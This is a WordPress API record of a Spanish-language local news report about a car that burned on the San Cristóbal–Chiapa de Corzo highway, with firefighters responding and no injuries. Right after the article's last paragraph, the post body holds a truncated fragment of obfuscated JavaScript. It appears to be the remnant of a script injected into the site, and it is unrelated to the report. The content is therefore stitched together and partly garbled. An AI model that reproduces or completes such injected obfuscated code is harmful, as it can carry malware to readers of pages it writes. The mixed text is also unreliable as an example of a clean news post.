{"id":14093,"date":"2024-02-10T02:47:50","date_gmt":"2024-02-10T02:47:50","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14093"},"modified":"2024-02-10T02:47:50","modified_gmt":"2024-02-10T02:47:50","slug":"se-incendia-vehiculo-sobre-carretera-de-san-cristobal-a-tuxtla-gutierrez","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14093","title":{"rendered":"Se incendia veh\u00edculo sobre carretera de San Crist\u00f3bal a Tuxtla Gutierrez"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"968\" height=\"423\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/WhatsApp-Image-2024-02-09-at-5.58.51-PM.jpeg\" alt=\"\" class=\"wp-image-14094\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/WhatsApp-Image-2024-02-09-at-5.58.51-PM.jpeg 968w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/WhatsApp-Image-2024-02-09-at-5.58.51-PM-300x131.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/WhatsApp-Image-2024-02-09-at-5.58.51-PM-768x336.jpeg 768w\" sizes=\"auto, (max-width: 968px) 100vw, 968px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Un veh\u00edculo termin\u00f3 consumido por las llamas sobre el tramo carretero de San Crist\u00f3bal a Chiapa de Corzo la ma\u00f1ana de este viernes, al parecer por un problema en el circuito el\u00e9ctrico.<\/p>\n\n\n\n<p>El percance se dio alrededor de las 07:48 de la ma\u00f1ana en la autopista a la altura del kil\u00f3metro 34, hasta donde llegaron de la estaci\u00f3n central del Heroico Cuerpo de Bomberos de San Crist\u00f3bal de Las Casas al mando del comandante C\u00e9sar Cameras, donde se reportaron solamente p\u00e9rdidas materiales.<\/p>\n\n\n\n<p>A pesar de lo rapido en haber llegado al lugar, el veh\u00edculo de color rojo fue consumido en su totalidad, del cual el conductor logr\u00f3 salir tras notar el incidente.<\/p>\n\n\n\n<p>Por varias horas el tramo se vio interrumpido.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal San Crist\u00f3bal de Las Casas.- Un veh\u00edculo termin\u00f3 consumido por las llamas sobre el tramo carretero de San Crist\u00f3bal a Chiapa de Corzo la ma\u00f1ana de este viernes, al parecer por un problema en el circuito el\u00e9ctrico. El percance se dio alrededor de las 07:48 de la ma\u00f1ana en la autopista a la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14094,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-14093","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14093","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14093"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14093\/revisions"}],"predecessor-version":[{"id":14095,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14093\/revisions\/14095"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14094"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14093"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14093"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14093"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}